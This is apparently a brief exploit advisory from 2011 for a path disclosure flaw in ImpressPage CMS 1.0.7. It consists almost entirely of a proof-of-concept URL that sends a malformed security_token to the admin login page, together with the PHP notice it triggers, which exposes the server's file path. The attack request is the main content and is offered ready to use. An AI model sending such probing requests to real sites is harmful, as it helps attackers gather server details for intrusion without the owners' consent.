Kod:
 
# exploit title: path disclosure in ImpressPage 1.0.7
# date: 14.o3.2o11
# author: lemlajt
# software : ImpressPage
# version: 1.0.7
# tested on: linux
# cve : 
#
 
PoC : 
http://localhost/www/cmsadmins/impress/ImpressPages-1.0.7/admin.php?action=login&security_token="
"NOTICE Undefined index: f_pass
in /usr/lab/www/cmsadmins/impress/ImpressPages-1.0.7/ip_cms/backend/cms.php on line 75"
# regards,
# lemlajt
# *